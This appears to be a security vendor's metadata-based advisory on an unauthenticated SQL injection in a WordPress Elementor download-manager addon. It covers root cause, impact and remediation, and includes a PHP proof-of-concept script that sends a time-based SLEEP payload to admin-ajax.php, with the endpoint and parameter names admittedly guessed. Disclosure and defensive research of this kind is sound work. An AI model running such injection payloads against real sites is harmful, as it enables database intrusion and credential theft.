Atomic Edge analysis of CVE-2026-24956 (metadata-based):
This vulnerability is an unauthenticated SQL injection in the Download Manager Addons for Elementor WordPress plugin, affecting versions up to and including 1.3.0. The flaw resides in a component that processes user-supplied parameters without proper sanitization, allowing attackers to execute arbitrary SQL commands. The CVSS score of 7.5 (High) reflects the network-based, low-complexity attack vector that leads to high confidentiality impact with no integrity or availability loss.
Atomic Edge research infers the root cause is improper neutralization of special elements in an SQL command (CWE-89). The description states insufficient escaping and lack of sufficient query preparation. This indicates the plugin likely constructs SQL queries by directly concatenating unsanitized user input into the query string. The vulnerable code path is almost certainly an AJAX handler or a shortcode callback registered by the plugin, as these are common entry points for unauthenticated users in WordPress addons. This conclusion is inferred from the CWE and standard plugin patterns, not confirmed via source code.
Exploitation requires an attacker to send a crafted HTTP request containing malicious SQL payloads. The likely endpoint is `/wp-admin/admin-ajax.php` with an `action` parameter corresponding to a plugin-specific AJAX hook, such as `wpdm_elementor_get_data` or similar. An alternative vector could be a public-facing shortcode that accepts a user-controlled parameter like `id` or `download_id`. The payload would append a UNION-based SELECT statement to extract data from the WordPress database, such as user credentials or sensitive plugin data.
Remediation requires implementing proper input validation and using prepared statements with parameterized queries. The patched version 2.0.0 likely replaced raw SQL concatenation with the WordPress `$wpdb->prepare()` method or equivalent prepared statement APIs. Proper escaping functions like `esc_sql()` are insufficient for full query protection and should not be the sole fix. The patch also likely added a capability check or a nonce verification, though the primary flaw was the SQL injection itself.
The impact of successful exploitation is full compromise of database confidentiality. Attackers can extract sensitive information including WordPress user credentials (hashed passwords), personally identifiable information, and any custom data managed by the Download Manager plugin. This can lead to site takeover, privilege escalation, and further network penetration if reused credentials are exposed. No direct integrity or availability impact is indicated by the CVSS vector.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24956 - Download Manager Addons for Elementor <= 1.3.0 - Unauthenticated SQL Injection
<?php
$target_url = 'http://target-site.com';
// The exact AJAX action name is not confirmed from metadata.
// Based on plugin slug 'wpdm-elementor', a common pattern is used.
$ajax_action = 'wpdm_elementor_get_downloads';
// The vulnerable parameter name is also inferred. Common parameters include 'id', 'download_id', or 'search'.
$vuln_param = 'id';
// Construct the URL for the WordPress AJAX handler.
$url = $target_url . '/wp-admin/admin-ajax.php';
// Build a time-based blind SQL injection payload to confirm vulnerability.
// This payload uses MySQL's SLEEP function and is less intrusive than data extraction.
$payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)-- ";
$post_data = array(
'action' => $ajax_action,
$vuln_param => $payload
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 15); // Increase timeout to detect sleep.
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
curl_close($ch);
$request_duration = $end_time - $start_time;
if ($request_duration > 5) {
echo "Potential SQL Injection vulnerability detected. Request delayed by " . round($request_duration, 2) . " seconds.n";
} else {
echo "No time delay detected. The endpoint or parameter may be incorrect.n";
echo "Consider enumerating other AJAX actions or parameter names.n";
}
// Note: This PoC is based on inferred patterns. Actual exploitation may require adjusting the action or parameter name.
// A real attack would use UNION SELECT statements to extract data from the wp_users table.
?>
